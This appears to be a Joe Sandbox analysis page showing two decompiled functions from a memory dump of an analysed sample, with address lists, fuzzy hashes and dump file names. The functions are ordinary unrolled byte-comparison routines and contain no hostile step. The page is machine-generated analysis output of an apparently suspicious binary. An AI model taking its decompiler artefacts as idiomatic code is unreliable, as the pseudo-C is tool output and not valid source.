0x00080c45
0x00080c1a
0x00080c23
0x00000000
0x00000000
0x00000000
0x00080c23
0x00080bf8
0x00080c01
0x00000000
0x00000000
0x00000000
0x00080b4f
0x00080b4f
0x00080b56
0x00080b58
0x00080b70
0x00080b70
0x00080b78
0x00080b7a
0x00080b92
0x00080b92
0x00080b9a
0x00080b9c
0x00080bb4
0x00080bb4
0x00080bbc
0x00080bbe
0x00080bc7
0x00080bc7
0x00000000
0x00080bbe
0x00080ba2
0x00080ba5
0x00080bae
0x00080706
0x00080706
0x000814f7
0x000814f7
0x00000000
0x00080bae
0x00080b80
0x00080b83
0x00080b8c
0x00000000
0x00000000
0x00000000
0x00080b8c
0x00080b5e
0x00080b61
0x00080b6a
0x00000000
0x00000000
0x00000000
0x00080b6a

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 9844138033648428146d86ef93c6ce1537846ba269763aed0e6d262b8cb12e8d
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: A1C18F362195930ADBED9639853403FBAE16BA27B131A076DD4F2CB1D5FE20D52CDB20

Uniqueness

Uniqueness Score: -1.00%

Function 00080F78 Relevance: .3, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00080F78(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}

0x00080f78
0x00080f78
0x00080f7e
0x00081006
0x00081008
0x0008100a
0x00000000
0x00000000
0x00081010
0x00081016
0x0008109d
0x0008109f
0x000810a1
0x00000000
0x00000000
0x000810a7
0x000810ad
0x00081134
0x00081136
0x00081138
0x00000000
0x00000000
0x0008113e
0x00081144
0x000811cb
0x000811cd
0x000811cf
0x00000000
0x00000000
0x000811db
0x00081263
0x00081265
0x00081267
0x00000000
0x00000000
0x0008126d
0x00081273
0x000812fa
0x000812fc
0x000812fe
0x00000000
0x00000000
0x00081304
0x0008130a
0x00081391
0x00081393
0x00081395
0x00000000
0x00000000
0x000813a3
0x000813a5
0x000813bd
0x000813c5
0x000813c7
0x00080b20
0x00080b28
0x00080b2a
0x00080b37
0x00080b37
0x00000000
0x00080b2a
0x000813d4
0x00080b1a
0x00000000
0x00000000
0x00000000
0x00000000
0x00080b1a
0x000813ae
0x000813b7
0x00000000
0x00000000
0x00000000
0x000813b7
0x00081317
0x00081319
0x00081331
0x00081339
0x0008133b
0x00081353
0x0008135b
0x0008135d
0x00081375
0x0008137d
0x0008137f
0x00081388
0x00081388
0x00000000
0x0008137f
0x00081366
0x0008136f
0x00000000
0x00000000
0x00000000
0x0008136f
0x00081344
0x0008134d
0x00000000
0x00000000
0x00000000
0x0008134d
0x00081322
0x0008132b
0x00000000
0x00000000
0x00000000
0x0008132b
0x00081280
0x00081282
0x0008129a
0x000812a2
0x000812a4
0x000812bc
0x000812c4
0x000812c6
0x000812de
0x000812e6
0x000812e8
0x000812f1
0x000812f1
0x00000000
0x000812e8
0x000812cf
0x000812d8
0x00000000
0x00000000
0x00000000
0x000812d8
0x000812ad
0x000812b6
0x00000000
0x00000000
0x00000000
0x000812b6
0x0008128b
0x00081294
0x00000000
0x00000000
0x00000000
0x00081294
0x000811e9
0x000811eb
0x00081203
0x0008120b
0x0008120d
0x00081225
0x0008122d
0x0008122f
0x00081247
0x0008124f
0x00081251
0x0008125a
0x0008125a
0x00000000
0x00081251
0x00081238
0x00081241
0x00000000
0x00000000
0x00000000
0x00081241
0x00081216
0x0008121f
0x00000000
0x00000000
0x00000000
0x0008121f
0x000811f4
0x000811fd
0x00000000
0x00000000
0x00000000
0x000811fd
0x00081151
0x00081153
0x0008116b
0x00081173
0x00081175
0x0008118d
0x00081195
0x00081197
0x000811af
0x000811b7
0x000811b9
0x000811c2
0x000811c2
0x00000000
0x000811b9
0x000811a0
0x000811a9
0x00000000
0x00000000
0x00000000
0x000811a9
0x0008117e
0x00081187
0x00000000
0x00000000
0x00000000
0x00081187
0x0008115c
0x00081165
0x00000000
0x00000000
0x00000000
0x00081165
0x000810ba
0x000810bc
0x000810d4
0x000810dc
0x000810de
0x000810f6
0x000810fe
0x00081100
0x00081118
0x00081120
0x00081122
0x0008112b
0x0008112b
0x00000000
0x00081122
0x00081109
0x00081112
0x00000000
0x00000000
0x00000000
0x00081112
0x000810e7
0x000810f0
0x00000000
0x00000000
0x00000000
0x000810f0
0x000810c5
0x000810ce
0x00000000
0x00000000
0x00000000
0x000810ce
0x00081023
0x00081025
0x0008103d
0x00081045
0x00081047
0x0008105f
0x00081067
0x00081069
0x00081081
0x00081089
0x0008108b
0x00081094
0x00081094
0x00000000
0x0008108b
0x00081072
0x0008107b
0x00000000
0x00000000
0x00000000
0x0008107b
0x00081050
0x00081059
0x00000000
0x00000000
0x00000000
0x00081059
0x0008102e
0x00081037
0x00000000
0x00000000
0x00000000
0x00080f84
0x00080f88
0x00080f8c
0x00080f8e
0x00080fa6
0x00080fa6
0x00080fae
0x00080fb0
0x00080fc8
0x00080fc8
0x00080fd0
0x00080fd2
0x00080fea
0x00080fea
0x00080ff2
0x00080ff4
0x00080ffd
0x00080ffd
0x00000000
0x00080ff4
0x00080fd8
0x00080fdb
0x00080fe4
0x00000000
0x00000000
0x00000000
0x00080fe4
0x00080fb6
0x00080fb9
0x00080fc2
0x00000000
0x00000000
0x00000000
0x00080fc2
0x00080f94
0x00080f97
0x00080fa0
0x00000000
0x00000000
0x00000000
0x00080fa0
0x00080706
0x00080706
0x000814f7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 74263dfcbda52a6ba1a95e99f142abaf23ff76577993826d64d74bf4a6e4835b
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: E2C1D3362090930ADFAD9639853407FBAE56FA27B131A076DD4F2CB1D4FE20D529DB20

Uniqueness

Uniqueness Score: -1.00%

Function 0008070E Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0008070E(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}

0x0008070e
0x0008070e
0x00080714
0x0008078b
0x0008078d
0x0008078f
0x00000000
0x00000000
0x00080795
0x0008079b
0x00080822
0x00080824
0x00080826
0x00000000
0x00000000
0x0008082c
0x00080832
0x000808b9
0x000808bb
0x000808bd
0x00000000
0x00000000
0x000808c3
0x000808c9
0x00080950
0x00080952
0x00080954
0x00000000
0x00000000
0x0008095a
0x00080960
0x000809e7
0x000809e9
0x000809eb
0x00000000
0x00000000
0x000809f7
0x00080a7f
0x00080a81
0x00080a83
0x00000000
0x00000000
0x00080a89
0x00080a8f
0x00080b16
0x00080b18
0x00080b1a
0x00080b28
0x00080b2a
0x00080b37
0x00080b37
0x00080b2a
0x00000000
0x00080b1a
0x00080a9c
0x00080a9e
0x00080ab6
0x00080abe
0x00080ac0
0x00080ad8
0x00080ae0
0x00080ae2
0x00080afa
0x00080b02
0x00080b04
0x00080b0d
0x00080b0d
0x00000000
0x00080b04
0x00080aeb
0x00080af4
0x00000000
0x00000000
0x00000000
0x00080af4
0x00080ac9
0x00080ad2
0x00000000
0x00000000
0x00000000
0x00080ad2
0x00080aa7
0x00080ab0
0x00000000
0x00000000
0x00000000
0x00080ab0
0x00080a05
0x00080a07
0x00080a1f
0x00080a27
0x00080a29
0x00080a41
0x00080a49
0x00080a4b
0x00080a63
0x00080a6b
0x00080a6d
0x00080a76
0x00080a76
0x00000000
0x00080a6d
0x00080a54
0x00080a5d
0x00000000
0x00000000
0x00000000
0x00080a5d
0x00080a32
0x00080a3b
0x00000000
0x00000000
0x00000000
0x00080a3b
0x00080a10
0x00080a19
0x00000000
0x00000000
0x00000000
0x00080a19
0x0008096d
0x0008096f
0x00080987
0x0008098f
0x00080991
0x000809a9
0x000809b1
0x000809b3
0x000809cb
0x000809d3
0x000809d5
0x000809de
0x000809de
0x00000000
0x000809d5
0x000809bc
0x000809c5
0x00000000
0x00000000
0x00000000
0x000809c5
0x0008099a
0x000809a3
0x00000000
0x00000000
0x00000000
0x000809a3
0x00080978
0x00080981
0x00000000
0x00000000
0x00000000
0x00080981
0x000808d6
0x000808d8
0x000808f0
0x000808f8
0x000808fa
0x00080912
0x0008091a
0x0008091c
0x00080934
0x0008093c
0x0008093e
0x00080947
0x00080947
0x00000000
0x0008093e
0x00080925
0x0008092e
0x00000000
0x00000000
0x00000000
0x0008092e
0x00080903
0x0008090c
0x00000000
0x00000000
0x00000000
0x0008090c
0x000808e1
0x000808ea
0x00000000
0x00000000
0x00000000
0x000808ea
0x0008083f
0x00080841
0x00080859
0x00080861
0x00080863
0x0008087b
0x00080883
0x00080885
0x0008089d
0x000808a5
0x000808a7
0x000808b0
0x000808b0
0x00000000
0x000808a7
0x0008088e
0x00080897
0x00000000
0x00000000
0x00000000
0x00080897
0x0008086c
0x00080875
0x00000000
0x00000000
0x00000000
0x00080875
